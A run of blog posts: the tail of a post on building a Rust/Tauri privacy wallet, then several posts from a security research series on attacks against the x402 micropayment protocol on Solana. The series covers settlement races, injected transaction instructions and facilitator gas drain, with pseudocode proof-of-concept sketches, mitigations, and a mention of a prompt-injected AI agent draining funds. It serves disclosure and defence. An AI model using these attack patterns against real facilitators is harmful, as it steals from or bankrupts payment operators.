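  const salt = randomBytes(16);
  const nonce = randomBytes(12); // ChaCha20-Poly1305 uses a 96-bit nonce
  const cipher = createCipheriv("chacha20-poly1305", deriveKey(password, salt), nonce, {
    authTagLength: 16,
  });
  // Append the Poly1305 auth tag so decryption can verify integrity.
  const ciphertext = Buffer.concat([cipher.update(seed), cipher.final(), cipher.getAuthTag()]);
  return {
    salt: salt.toString("hex"),
    nonce: nonce.toString("hex"),
    ciphertext: ciphertext.toString("hex"),
  };
}

function decryptSeed(
  file: { salt: string; nonce: string; ciphertext: string },
  password: string,
): Buffer {
  const data = Buffer.from(file.ciphertext, "hex");
  const tag = data.subarray(data.length - 16);
  const body = data.subarray(0, data.length - 16);
  const decipher = createDecipheriv(
    "chacha20-poly1305",
    deriveKey(password, Buffer.from(file.salt, "hex")),
    Buffer.from(file.nonce, "hex"),
    { authTagLength: 16 },
  );
  decipher.setAuthTag(tag);
  // Throws on a wrong password or tampered ciphertext — the AEAD property.
  return Buffer.concat([decipher.update(body), decipher.final()]);
}
```

The AEAD tag is what makes "wrong password" indistinguishable from "tampered file": both fail authentication rather than yielding garbage seed bytes.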
The pubkey is stored in plaintext so the unlock screen can show "Unlock wallet ABC123..." before the user types anything. The frontend never sees the seed. Ever. Sign requests go through a Tauri command:

```rust
#[tauri::command]
pub async fn sign_and_send_transaction(/* ... */) -> Result<String, String> {
    // Decrypt seed using the in-memory unlock key, sign tx, send to RPC,
    // return the signature (base58). Seed is zeroized at end of scope.
}
```

If the frontend gets compromised, the worst it can do is request signatures. It cannot exfiltrate the key.

## Importing keys from Phantom and Solflare without breaking the trust model

The keystore had to handle three import paths from day one:

1. **Generate a new wallet** — fresh BIP39 mnemonic, derive seed, encrypt, store.
2. **Import a 12/24-word mnemonic** — same as above but seeded by user input.
3. **Import a raw private key** — base58 from Phantom, base64 from Solflare, base58 from `solana-keygen`. The raw 32-byte key goes in `seed` with `key_type = "raw_key"` so the unlock path knows not to treat it as BIP39 entropy.

The viewing-key derivation is web-wallet-compatible — the same HKDF schedule the original web wallet used, so a user can import the same seed and see the same shielded notes. That backwards-compat constraint cost me a day; without it the wallet would have been quietly incompatible with the SDK's `MemoryNoteStore` semantics.

## Groth16 in a webview

The wallet ships [the same circuit files as the web wallet](https://github.com/Dax911/zera-wallet-demo/tree/660283fe9a16d7f1a471cdf06542f5592bf8ba9f/public/circuits): `deposit.wasm`, `deposit_final.zkey`, `withdraw.wasm`, `withdraw_final.zkey`, `transfer.wasm`, `transfer_final.zkey`, plus `relayed_withdraw` variants. The Tauri webview loads them statically, runs `snarkjs.groth16.fullProve`, gets a proof + public signals out, and hands them back to Rust to format for Solana.
The split is intentional: - **JS proves.** Because snarkjs is the canonical, audited Groth16 prover for circomlib circuits. - **Rust signs.** Because the seed lives there. The tx flow is therefore: ``` JS: build inputs → snarkjs.fullProve → proof + publicSignals JS: send to Tauri command with proof, commitment, recipient Rust: decrypt seed → build solana tx (using SDK builders) → sign → send Rust: return signature to JS JS: on success, append note to encrypted note store ``` Snarkjs is heavy — about 30s on a cold proof, 5–8s warm — but the alternative is "ship a Rust-native Groth16 prover," which is a multi-week project of its own and which would still need to consume the same `.zkey` artifacts. ## Notes are private. Notes are also a database. A privacy wallet without a note store is just a key manager. Every shielded transaction produces output notes that *only the recipient can decrypt*, and the recipient has to scan the chain to find them. The wallet ships [`src/lib/noteEncryption.ts`](https://github.com/Dax911/zera-wallet-demo/blob/660283fe9a16d7f1a471cdf06542f5592bf8ba9f/src/lib/noteEncryption.ts), which implements ECDH + nacl.box (XSalsa20-Poly1305). The plaintext format is versioned and binary-packed: ```ts // v2: single note — 169 bytes plaintext // [0x02][amount u64 LE][secret 32B][blinding 32B] // [asset 32B][commitment 32B][nullifier 32B] // v3: note pair — 145 bytes plaintext // [0x03][amt1 u64 LE][secret1 32B][blinding1 32B] // [amt2 u64 LE][secret2 32B][blinding2 32B] // Used for splits where both outputs go to the same key. // Packing two notes into one nacl.box saves 265 bytes on-chain. const BINARY_V2_LEN = 1 + 8 + 32 + 32 + 32 + 32 + 32; // 169 const BINARY_V3_LEN = 1 + 72 + 72; // 145 ``` Why not JSON? Two reasons: 1. **Bytes are cheap on Solana, JSON is expensive.** Every byte you encrypt is a byte you store on-chain (or in an encrypted memo). 169 binary bytes compress to about 80% the size of equivalent JSON. 2. 
**Format versioning is robust.** A leading tag byte (0x02, 0x03) lets older wallets recognize unsupported formats and fall back gracefully instead of decrypting garbage.

## Note persistence

The thing nobody warns you about with privacy wallets: **if you lose your local note store, you can only recover funds by scanning the on-chain Merkle tree with your viewing key.** That scan is slow, expensive in RPC calls, and has to be done from scratch every time. So the wallet auto-persists notes to disk:

```ts
// src/lib/notePersistence.ts
const NOTES_FILE = "zera/notes.json";
const NFC_FILE = "zera/nfc-cards.json";

export async function saveNotesToDisk(notes: any[]): Promise<void> {
  await mkdir("zera", { baseDir: BaseDirectory.AppData, recursive: true })
    .catch(() => {});
  await writeTextFile(NOTES_FILE, JSON.stringify(notes, null, 2), {
    baseDir: BaseDirectory.AppData,
  });
}
```

Notes auto-save on every change and load on startup. The encrypted-at-rest version of this is on the roadmap; for v3 the notes file is plain JSON in `$APPDATA`, which assumes the user trusts their own machine. The next iteration wraps it in the same ChaCha20 layer the keystore uses.

## NFC bearer cards

The wallet's most futuristic feature — and the one most likely to feel like sci-fi to anyone who hasn't used it — is NFC bearer cards. From the `d061813` commit message:

> NFC page: real shielded notes, arbitrary amounts, custom mint, write pool notes to tags, read tags back into pool

The model: take an unspent shielded note from your pool, serialize the encrypted plaintext into an NFC tag's NDEF record, hand the physical card to someone. They tap it on their wallet, the wallet pulls the encrypted blob, decrypts it with their viewing key, and the note becomes theirs. No on-chain transaction at all. The note's nullifier is only revealed when the recipient eventually spends it.
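The payload on the tag is the same versioned binary note format from `noteEncryption.ts`. A hypothetical pack/unpack for the v2 single-note layout, with field order taken from the comment above (type and function names are mine, not the repo's):

```typescript
// v2 single-note layout: [0x02][amount u64 LE][secret][blinding][asset][commitment][nullifier]
const BINARY_V2_LEN = 1 + 8 + 32 * 5; // 169 bytes

interface NoteV2 {
  amount: bigint;
  secret: Uint8Array;     // 32 bytes
  blinding: Uint8Array;   // 32 bytes
  asset: Uint8Array;      // 32 bytes
  commitment: Uint8Array; // 32 bytes
  nullifier: Uint8Array;  // 32 bytes
}

function packNoteV2(n: NoteV2): Uint8Array {
  const buf = new Uint8Array(BINARY_V2_LEN);
  buf[0] = 0x02; // version tag: lets old wallets reject formats they don't know
  new DataView(buf.buffer).setBigUint64(1, n.amount, true); // u64, little-endian
  let off = 9;
  for (const field of [n.secret, n.blinding, n.asset, n.commitment, n.nullifier]) {
    buf.set(field, off);
    off += 32;
  }
  return buf;
}

function unpackNoteV2(buf: Uint8Array): NoteV2 {
  if (buf.length !== BINARY_V2_LEN || buf[0] !== 0x02) {
    throw new Error("unsupported note format");
  }
  const amount = new DataView(buf.buffer, buf.byteOffset).getBigUint64(1, true);
  const at = (i: number) => buf.slice(9 + 32 * i, 9 + 32 * (i + 1));
  return { amount, secret: at(0), blinding: at(1), asset: at(2), commitment: at(3), nullifier: at(4) };
}
```

Everything here is fixed-width, which is why the version byte is enough: there is no length prefix to parse before you know whether you can parse at all.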
This is the "physical cash" path I'd been sketching since the [a better cryptocurrency](/blog/a_better_crypto/) post a year earlier, and the [m0n3y voting proposal](/blog/m0n3y_naming_a_dream/). The wallet shipped it as a real button. PC/SC and Proxmark3 hardware are both supported in `src-tauri/`.

## Trade-offs

**Why Tauri instead of Electron?** Because Electron ships a 200MB Chrome runtime and its security model has been a moving target for years. Tauri's webview + minimal-IPC model gives me the trust boundary I need (Rust ↔ JS) for free.

**Why snarkjs in JS instead of a Rust prover?** Because snarkjs is the audited canonical prover for circomlib circuits. Rolling my own Rust prover would have shifted weeks of audit risk onto a Rust crate that nobody else uses.

**Why plain JSON note persistence in v3?** Because the alternative was holding the wallet release for an encrypted-at-rest design pass that was already a TODO. v3 ships now; encryption-at-rest of the note store ships in v3.1.

**Why ship a viewing-key compatibility layer with the web wallet?** Because the only thing worse than a privacy wallet you can't import into is a privacy wallet that *silently* doesn't import the same notes. Compatibility is a design constraint that has to be in v1 of any new client.

## What this taught me

The trust boundary of a wallet is the most expensive surface in the project. Every subsystem you build either reinforces it (Rust holds the seed; JS sees ciphertexts) or breaks it (JS reads the keystore; key escrow services). v3 reinforced. The cost: ~30% of the codebase is the IPC plumbing. The benefit: a [Rusty Pipes](/blog/rusty_pipes/) compromise of the JS supply chain doesn't lose anyone's funds.
## Further reading - [zera-wallet-demo on GitHub](https://github.com/Dax911/zera-wallet-demo) - [Initial v3 commit](https://github.com/Dax911/zera-wallet-demo/commit/39b55182b349da8896cd841dad753bb162ddcc48) - [ZKP core + real data layer](https://github.com/Dax911/zera-wallet-demo/commit/660283fe9a16d7f1a471cdf06542f5592bf8ba9f) - [P2P send + NFC bearer notes](https://github.com/Dax911/zera-wallet-demo/commit/d061813aa98d83aa7dfcb59f0a7ce7c5ef3993d2) - [Tauri 2.x docs](https://v2.tauri.app/) - [snarkjs](https://github.com/iden3/snarkjs) — the Groth16 prover this wallet ships in JS. - [Building the Zera SDK day one](/blog/zera_sdk_scaffolding/) — the engine this wallet drives. --- # x402 Vector 2: partial-signing instruction injection Canonical: https://blog.skill-issue.dev/blog/x402_partial_signing_injection/ Description: The x402 client builds and partially signs the entire VersionedTransaction. A facilitator that validates structure but not bytes can co-sign a tx with extra clawback / drain instructions appended after the legitimate transfer. Published: 2026-03-23T18:00:00.000Z Tags: security, x402, solana, transaction-injection, research import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; The trust split in x402 is unusual. The **client** builds the entire VersionedTransaction. The **facilitator** signs as feePayer and submits. The facilitator pays gas; the client picks the recipient, the amount, the compute budget — *and the rest of the instructions*. Most facilitators validate that the tx contains a `TransferChecked` for the agreed-upon (mint, amount, recipient). They do not always validate that **nothing else** is in the tx. That's the bug. Post 3 of the [x402 attack surface series](/series/x402-attack-surface/). 
## The trust gap

A typical x402 transaction looks like:

```
[0] ComputeBudgetProgram::SetComputeUnitLimit(40_000)
[1] ComputeBudgetProgram::SetComputeUnitPrice(5)
[2] TokenProgram::TransferChecked(amount=1000, mint=USDC, src, dst)
```

The facilitator's `/verify` endpoint typically:

1. Decodes the tx.
2. Checks `feePayer == self.address`.
3. Loops through instructions; finds the `TransferChecked`; asserts amount + recipient match.
4. Returns 200.

What the facilitator usually does **not** check:

- The presence of *additional* instructions after the transfer.
- Whether the recipient ATA belongs to a token-2022 mint with a transfer hook that calls back into a malicious program.
- Whether the `mint` field of the `TransferChecked` matches the protocol-spec'd USDC mint *byte-for-byte* (the SPL token program checks the mint's pubkey but doesn't enforce a particular mint).

## Three injection patterns

### Pattern A: clawback via post-transfer CPI

Append an instruction that calls a custom program. Solana's authority model constrains what that instruction can do: the client signs only with their own key, so appended instructions cannot exercise the *facilitator's* authority. They can:

- Use the client's keypair (signing already authorized).
- Use any account the client controls.
- Burn compute units the facilitator pays for.

**Useful injection #1 (Pattern A1):** Burn the facilitator's CU budget. Append a 30k-CU compute-burning instruction (e.g., a no-op loop in a custom program). The transfer succeeds at 5k CU; the burn adds 30k CU; the facilitator pays for 35k CU instead of 5k. Per-tx gas drain magnified ~7×.

**Useful injection #2 (Pattern A2):** Force a fail *after* the transfer succeeds.
If the facilitator's verify path checks the transfer instruction is present but doesn't simulate the whole tx, an instruction that asserts a false condition (e.g., a custom `assert_value_equal(0, 1)`) **fails the entire transaction** and rolls back the transfer. The client's PAYMENT-RESPONSE looks valid (signed, submitted), the facilitator paid gas, but no token actually moved. Combined with the [settlement race](/blog/x402_settlement_race_condition/), this is monetisable.

### Pattern B: token-2022 transfer hook

If the destination ATA is a token-2022 mint *with a transfer hook program*, every transfer to that ATA triggers a CPI into the hook program — which runs with the privileges of the SPL Token-2022 invoker. The client controls the destination. If the client picks a destination ATA on a mint with a hostile transfer hook, the hook runs after the transfer with arbitrary code. The protocol spec says "use USDC", but spec compliance is enforced by the facilitator's validator, not by Solana itself.

### Pattern C: minimum-amount string trick

Combined with [Vector 9 (amount string parsing)](/blog/x402_amount_string_parser/): the PAYMENT-REQUIRED says `"1000"` (= $0.001). The client encodes `"01000"` in the SPL transfer — `"1000"` with a leading zero, which the validator's `parseInt` accepts. The attack lives in any divergence between what the validator's string parser computes and the raw `u64` base-unit amount the SPL program actually moves: lenient parsers, legacy leading-zero handling, rounding on parse. Some validators round; some don't. Mismatch = pay less than required.

## PoC sketch

```rust
// Pseudocode — see repo
fn craft_malicious_tx(facilitator: &Pubkey, client: &Keypair, amount: u64) -> VersionedTransaction {
    let mut ixs = vec![
        compute_budget::set_unit_limit(40_000),
        compute_budget::set_unit_price(5),
        spl_token::transfer_checked(...),
    ];

    // Inject a CU-burner that fires AFTER the transfer.
    ixs.push(custom_program::cu_burn_30k());

    let blockhash = recent_blockhash();
    let msg = Message::new_with_blockhash(&ixs, Some(facilitator), &blockhash);
    // Two signature slots: [0] = facilitator (feePayer), [1] = client.
    let mut tx = VersionedTransaction {
        signatures: vec![Signature::default(); 2],
        message: msg.into(),
    };

    // Client signs; the facilitator's slot stays default until /settle.
    tx.signatures[1] = client.sign_message(&tx.message.serialize());
    tx
}
```

## Mitigations

The fix is small but architecturally pointed:

1. **Whitelist the instruction prefix.** The facilitator's `/verify` should require the instruction list to be *exactly* `[ComputeBudgetSetUnitLimit, ComputeBudgetSetUnitPrice, TransferChecked]`, no extras. Reject anything with a 4th instruction.
2. **Pin the compute unit limit.** Don't accept client-supplied CU budgets above 5k. Inject your own.
3. **Pin the mint.** Don't accept any mint in the transfer; require an exact match against the facilitator's allowlist (`USDC mainnet only`).
4. **Simulate before signing.** Run `simulateTransaction` against the partially-signed tx before adding the feePayer signature. If sim fails or returns unexpected logs, reject.
5. **Reject token-2022 mints with hooks** unless the hook program is on an allowlist.

(1) and (2) together kill Pattern A, including the CU-burn variant. (3) and (5) together kill Pattern B. (4) is good defense in depth.

## Why the spec hasn't fixed this

Probably because the original x402 design assumes the client is benign — they're paying for content, why would they sabotage their own payment? The threat model that breaks this is "the client is also the merchant" or "the client is also a competing facilitator" or just "the client is a researcher". Once you accept that the spec must work against malicious clients, Pattern A1 (CU burn) is the single highest-impact fix.
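Mitigation 1 is small enough to sketch. The decoded-instruction shape and names here are assumptions, not x402 reference code; a real facilitator would decode these from the `VersionedTransaction` message before comparing:

```typescript
// Sketch: require the instruction list to be exactly the expected
// three-instruction prefix. Anything appended is rejected outright.
interface DecodedInstruction {
  programId: string; // base58 program id
  kind: string;      // e.g. "SetComputeUnitLimit", "TransferChecked"
}

const COMPUTE_BUDGET = "ComputeBudget111111111111111111111111111111";
const TOKEN_PROGRAM = "TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA";

const EXPECTED: Array<[programId: string, kind: string]> = [
  [COMPUTE_BUDGET, "SetComputeUnitLimit"],
  [COMPUTE_BUDGET, "SetComputeUnitPrice"],
  [TOKEN_PROGRAM, "TransferChecked"],
];

function verifyInstructionList(ixs: DecodedInstruction[]): boolean {
  // Length check alone closes Pattern A: a 4th instruction means rejection.
  if (ixs.length !== EXPECTED.length) return false;
  return ixs.every(
    (ix, i) => ix.programId === EXPECTED[i][0] && ix.kind === EXPECTED[i][1],
  );
}
```

Note that this is a positional whitelist, not a "contains a TransferChecked" scan — the difference between the two is exactly the injection surface described above.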
## Bibliography - [Dax911/x402_mal/research/instruction-injection/](https://github.com/Dax911/x402_mal/tree/main/research) - Solana Token-2022 Transfer Hook: [docs.solanalabs.com](https://spl.solana.com/token-2022/extensions#transfer-hook) - ComputeBudgetProgram: [solana.com/docs](https://solana.com/docs/core/transactions/runtime#compute-units) Previous: [Settlement race ←](/blog/x402_settlement_race_condition/) · Next: [Facilitator gas drain →](/blog/x402_facilitator_gas_drain/) --- # x402 Vector 1: settlement race condition Canonical: https://blog.skill-issue.dev/blog/x402_settlement_race_condition/ Description: Coinbase x402's verify→settle pipeline isn't atomic. A client can submit the same PAYMENT-SIGNATURE to multiple facilitators in parallel, or race the facilitator with a direct on-chain submission. Double-spend within blockhash validity (~60s). Published: 2026-03-22T18:00:00.000Z Tags: security, x402, solana, race-condition, research import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; The cleanest vulnerability in the x402 protocol — also the one that's easiest to fix and the one most likely to bite production deployments. This post walks through the settlement race in detail, gives a PoC layout, and lists the mitigations that'd close it. Post 2 of the [SOLMAL series](/series/x402-attack-surface/) on x402. ## The bug The x402 settlement flow has two server-side calls: 1. `POST /verify { tx, expected }` — facilitator returns 200 if the partially-signed tx is well-formed and pays the right amount. 2. `POST /settle { tx }` — facilitator co-signs as feePayer and submits the tx to Solana. In every reference implementation I've seen, these are independent HTTP handlers with no shared lock. **A signed PAYMENT-SIGNATURE can be submitted to `/settle` more than once.** The facilitator will: - Re-co-sign with feePayer (idempotent — same tx hash). - Re-submit to Solana RPC. 
Solana itself deduplicates — the second submission of an already-confirmed tx returns `AlreadyProcessed`. Fine. But there's a window between *the client submitting tx_a* and *Solana confirming tx_a* during which a different transaction *signed with the same client key* (tx_b, with a different blockhash or a different recipient ATA, and therefore a different signature) can also be settled. The client paid once; the merchant believed they were paid; the underlying ledger says otherwise.

## Three concrete scenarios

### Scenario 1: parallel facilitator submission

If a network has multiple facilitators (Coinbase plus third parties), the client can:

1. Build the PAYMENT-SIGNATURE.
2. POST to facilitator A's `/settle`.
3. POST the same payload to facilitator B's `/settle` 50ms later.
4. Both facilitators submit. The first to land on Solana wins; the loser sees `AlreadyProcessed`.

Result: only one tx settles on-chain, but both facilitators did the settlement work, and **both believed they had successfully settled the payment** (depending on RPC client timing). Some facilitator implementations cache `/settle` responses by request hash; others cache by tx signature; others don't cache. The cache discrepancy is the monetisable bit.

### Scenario 2: client-side bypass

1. Client receives `PAYMENT-REQUIRED` with feePayer=facilitator.
2. Client builds the PAYMENT-SIGNATURE.
3. Client **also** builds a *different* tx, signed with the same client key, paying a different recipient ATA — say, a second ATA the client controls.
4. Client submits the second tx directly to Solana RPC.
5. Client submits the PAYMENT-SIGNATURE to `/settle`.

If Solana confirms the *second* tx first (because the facilitator's RPC is in a different region with higher latency), the merchant's real settlement fails. The client never paid the merchant; the client paid themselves. The merchant might still grant access if they don't watch the on-chain confirmation tightly.

### Scenario 3: rapid replay

Submit the same `PAYMENT-SIGNATURE` to the same facilitator 50 times in 1 second.
If the facilitator's `/settle` handler doesn't lock-and-dedupe on the request payload hash, every call submits to Solana. 49 of 50 will fail with `AlreadyProcessed`, but during the racing window some may compute against stale state and reach unexpected outcomes (rent reclaims, ATA-init double-fee, etc.). ## PoC structure The repo contains a Rust harness in [research/race-spammer/](https://github.com/Dax911/x402_mal/tree/main/research): ```rust // Pseudocode — see repo for the runnable version. async fn race_test(facilitator: &Url, client: &Keypair) -> RaceResult { let req = build_payment_request(client); let sig = build_payment_signature(&req, client); let handles: Vec<_> = (0..50).map(|_| { let url = facilitator.clone(); let s = sig.clone(); tokio::spawn(async move { settle(&url, s).await }) }).collect(); futures::future::join_all(handles).await } ``` 50 parallel `/settle` calls. Count: how many got HTTP 200? How many led to a confirmed Solana tx? How many cost the facilitator gas? ## Mitigations The fix is small but it does have to be coded: 1. **Atomic verify+settle.** Combine the two endpoints, or have `/settle` re-run verify under a lock keyed by the tx signature. 2. **Per-signature dedup.** Cache settled tx signatures in Redis / KV with TTL = blockhash validity (~60s) + safety margin. Reject duplicate `/settle` calls with HTTP 409. 3. **Confirmation polling.** `/settle` should not return until the tx is confirmed (level=`processed` minimum, ideally `confirmed`). Currently most implementations return on RPC submit, not on confirmation. 4. **Per-client rate limit on `/settle`.** Even with dedup, a malicious client can create N distinct signatures. Limit per-IP and per-client-key. Of these, (2) is the easy win. KV cache keyed by signature, TTL of 90 seconds. Stops scenarios 1 and 3 dead. ## What this means for x402 deployments If you're operating an x402 facilitator: implement (2) before going live. 
The TTL needs to be longer than blockhash validity to cover the late-replay edge case. Use Cloudflare Workers KV, AWS DynamoDB, Redis — anything with sub-100ms eventual consistency. If you're a merchant integrating x402: don't grant content access until the facilitator's `/settle` returns AND your own RPC poll confirms the tx. The current spec lets merchants act on the facilitator's word; the spec needs an explicit "signature confirmed at slot S" field, and merchants need to poll until they see that slot ≤ current_slot - 32 (final). ## Bibliography - [Dax911/x402_mal SOLMAL.md](https://github.com/Dax911/x402_mal/blob/main/SOLMAL.md) — full threat model - Solana Foundation. *Transaction confirmation levels.* - Coinbase Developer Platform. *x402 specification.* Previous: [Series intro ←](/blog/x402_attack_surface_intro/) · Next: [Partial-signing instruction injection →](/blog/x402_partial_signing_injection/) --- # x402 Vector 3: facilitator gas drain Canonical: https://blog.skill-issue.dev/blog/x402_facilitator_gas_drain/ Description: x402 facilitators pay all transaction fees and the spec defines no per-client rate limit. A flood of valid-looking transactions that fail at maximum compute-unit consumption is a per-request economic attack on the facilitator. Published: 2026-03-21T18:00:00.000Z Tags: security, x402, solana, dos, economic-attack, research import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; The x402 protocol has a fee model where the **facilitator pays gas**. This is the entire UX win — AI agents don't need SOL to make payments. It's also the entire economic attack surface. Post 4 of the [x402 attack surface series](/series/x402-attack-surface/). ## The economics For each settled x402 transaction, the facilitator pays: - 5,000 lamports base fee (Solana minimum, ~$0.001 at SOL=$200). - `compute_unit_limit × compute_unit_price` priority fee (configurable, max 5 microlamports/CU per spec, max 40,000 CU). 
- Worst-case priority fee: 40,000 CU × 5 microlamports/CU = 200,000 microlamports = 0.2 lamports — negligible next to the base fee.

So per tx, facilitator outflow is bounded at roughly the base fee, ~$0.001. That's fine for legitimate traffic. It's not fine when an attacker generates valid-looking PAYMENT-SIGNATUREs at 1000 req/sec.

## The attack: maximum-CU failure

Three flavors of failing transaction that maximally hurt the facilitator:

### Flavor A: legitimate-looking transfer that fails post-CU-burn

Recall from [Vector 2](/blog/x402_partial_signing_injection/): the client controls the instruction list. Append a custom-program call that:

1. Burns 35,000 CU in a no-op loop.
2. Asserts `False`, failing the entire tx.

Outcome: the facilitator pays the 5,000-lamport base fee plus the priority fee — Solana charges fees on failed transactions too. The tx reverts. The merchant gets nothing. Repeat at scale.

### Flavor B: valid-but-rejected mint

Specify the wrong mint in the SPL `TransferChecked`. The instruction validates client-side because the client controls the bytes. The instruction fails on-chain because the mint pubkey doesn't match the ATA. Solana's runtime evaluates the instruction before it can detect the failure — so the facilitator pays for the CU consumed.

### Flavor C: ATA derivation mismatch

The client supplies a destination ATA that derives from `(owner=A, mint=USDC)` but specifies `(owner=B, mint=USDC)` in the instruction. Solana's `transfer_checked` verifies the ATA is consistent with the supplied owner+mint and rejects. CU consumed: full instruction cost.

All three flavors share the property: **the facilitator's `/verify` returns 200 (validators check structure, not bytes)**, the facilitator pays gas to settle, the tx reverts on-chain, the merchant doesn't get paid, and the attacker has cost the facilitator money for nothing in return.

## Quantification

A single attacker on a residential Comcast connection can sustain ~100 req/sec to a single facilitator endpoint. At ~$0.001/tx:

- 100 req/sec × 60 sec/min × $0.001/tx = **$6/min in facilitator gas**
- Across an 8-hour business day: **$2,880/day**

Multiple attackers behind different IPs (e.g., a botnet of 1,000) push the daily cost toward $3M. Facilitator margins on legitimate x402 traffic are pennies per transaction. A sustained gas-drain attack at that scale burns the facilitator's runway in days.

## Why the spec doesn't address this

The spec assumes a "trusted client" model. AI agents operate semi-autonomously and **don't have an incentive to attack the facilitator they're paying** — except when they do. Specific incentive structures that make this attractive:

1. A competitor (rival facilitator) wants the target out of business.
2. A nation-state actor wants to disrupt agentic-economy infrastructure.
3. A researcher (this writer) wants to demonstrate the bug.
4. An AI agent that's been adversarially prompted to drain its own facilitator's funds.

Threat (4) is the one I find most interesting. An LLM that's been jailbroken via prompt injection could — at no cost to itself — execute the gas-drain attack against the facilitator, which is operationally what x402 was designed to make easy.

## Mitigations

In rough order of effectiveness:

1. **Per-client rate limit on `/settle`.** The facilitator must enforce N transactions per client-keypair per minute. A default of ~10 sounds fine; it can be raised for trusted clients via API key.
2. **CU budget cap.** The facilitator overrides the client's `set_unit_limit` and `set_unit_price` instructions, pinning them to ≤5,000 CU and 1 microlamport/CU. This caps the priority-fee component of the outflow (the 5,000-lamport base fee is fixed regardless).
3. **Pre-flight simulation.** Before adding the feePayer signature, run `simulateTransaction`. If sim returns `Err`, reject before paying gas. Shifts cost to a quick simulation call.
4. **Reputation-based throttle.** Track each client-keypair's settlement success ratio. Drop clients with under a 50% success rate to a lower rate limit.
5.
**Stake-or-pay deposits.** Out-of-band: clients deposit a small SOL bond with the facilitator. Failed transactions debit from the bond. Removes the asymmetric-cost property entirely. (1) is the bare minimum. (3) is the most operationally complex but also the most thorough. (5) is the Real Fix but requires protocol changes. ## What I'd do if I were operating an x402 facilitator ```python # Pseudocode for the verify+settle endpoint @app.post("/settle") async def settle(req: SettleRequest): client_pk = extract_client_pubkey(req.tx) # 1. Per-client rate limit if not await rate_limit.allow(client_pk, max=10, window=60): return 429, "rate_limited" # 2. Re-validate (don't trust /verify) if not validate_tx(req.tx, expected_mint=USDC, max_cu=5_000): return 400, "invalid_tx" # 3. Pre-flight simulate sim = await rpc.simulate_transaction(req.tx) if sim.err is not None: # Failed simulation = don't pay gas return 400, "sim_failed" # 4. Add feePayer sig + submit signed = sign_with_feepayer(req.tx) sig = await rpc.send_transaction(signed) # 5. Wait for confirmation before returning success await rpc.confirm_transaction(sig, level="confirmed") return 200, {"signature": sig} ``` Cost of all this: ~50ms added latency per settlement, plus one extra RPC call. Worth it. ## Bibliography - [Dax911/x402_mal/research/gas-drain-bench/](https://github.com/Dax911/x402_mal/tree/main/research) - Solana Compute Unit Pricing: [solana.com/docs](https://solana.com/docs/core/transactions/runtime#compute-units) - Cloudflare KV rate limiting patterns Previous: [Partial-signing injection ←](/blog/x402_partial_signing_injection/) · Next: [AI-agent wallet drain →](/blog/x402_ai_agent_wallet_drain/) --- # SOLMAL: the x402 attack surface (series intro) Canonical: https://blog.skill-issue.dev/blog/x402_attack_surface_intro/ Description: Mapping the attack surface of Coinbase's x402 micropayment protocol on Solana. 
Series intro covering the verify→settle pipeline, the actor model, the 9 vectors, and the responsible-disclosure timeline.
Published: 2026-03-20T18:00:00.000Z
Tags: security, x402, solana, ai-agents, research

import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

Coinbase shipped [x402](https://x402.org/) — a micropayment protocol that piggybacks on HTTP 402 (Payment Required) — in late 2025. It is, on paper, brilliant: AI agents pay for API access via stablecoin micropayments embedded in HTTP headers, the merchant doesn't need to run a payment processor, and a third-party "facilitator" sponsors gas on Solana so the agent doesn't need any SOL. In early 2026 I spent a few weeks staring at the protocol. I came away with **9 distinct attack vectors** plus a meta-finding about AI-agent wallets that is, I think, the single biggest risk. This post is the series opener.

## The protocol in 30 seconds

Three actors: **client** (an AI agent with a Solana wallet), **resource server** (the API the agent wants to call), **facilitator** (validates payments, sponsors gas, settles on-chain).

<Mermaid chart={`sequenceDiagram
    C->>S: GET /endpoint
    S-->>C: 402 + PAYMENT-REQUIRED header
    C->>C: Build partial VersionedTransaction
    Note over C: client signs, feePayer = facilitator
    C->>S: GET + PAYMENT-SIGNATURE header
    S->>F: /verify (is this tx valid?)
    F-->>S: 200 ok
    S->>F: /settle (co-sign as feePayer, submit)
    F->>F: Submit to Solana
    F-->>S: 200 + signature
    S-->>C: 200 + content + PAYMENT-RESPONSE
`}/>

The Solana-specific bits:

- Client builds a `VersionedTransaction` with an SPL `TransferChecked` instruction.
- `feePayer` is the facilitator's address.
- Client only **partially signs** (their key); the facilitator adds the feePayer signature.
- USDC mint: `EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v`. 6 decimals, so `"1000"` = $0.001.
- Compute budget capped at 40,000 CU, max 5 microlamports/CU.
- Blockhash valid ~60 seconds (151 slots).

## The 9 vectors

| # | Vector | Severity | Post |
|---|--------|----------|------|
| 1 | Settlement race condition | High | [walkthrough](/blog/x402_settlement_race_condition/) |
| 2 | Transaction manipulation (partial signing) | High | [walkthrough](/blog/x402_partial_signing_injection/) |
| 3 | Facilitator gas drain | Medium | [walkthrough](/blog/x402_facilitator_gas_drain/) |
| 4 | Blockhash replay window | Medium | (post 6) |
| 5 | Facilitator impersonation via feePayer field | Medium | (post 6) |
| 6 | AI-agent wallet exploitation | **High** | [walkthrough](/blog/x402_ai_agent_wallet_drain/) |
| 7 | Header injection / parsing bugs | Medium | (post 6) |
| 8 | ATA derivation manipulation | Medium | (post 6) |
| 9 | Amount-string parsing | Medium | [walkthrough](/blog/x402_amount_string_parser/) |

The five posts in this series cover Vectors 1, 2, 3, 6, 9 in detail. Vectors 4, 5, 7, 8 are noted in the [SOLMAL.md](https://github.com/Dax911/x402_mal/blob/main/SOLMAL.md) research log and will land as a sweep post once I've written PoCs for each.

## What's load-bearing about each vector

**Vector 1 (Settlement Race).** The verify→settle pipeline isn't atomic.
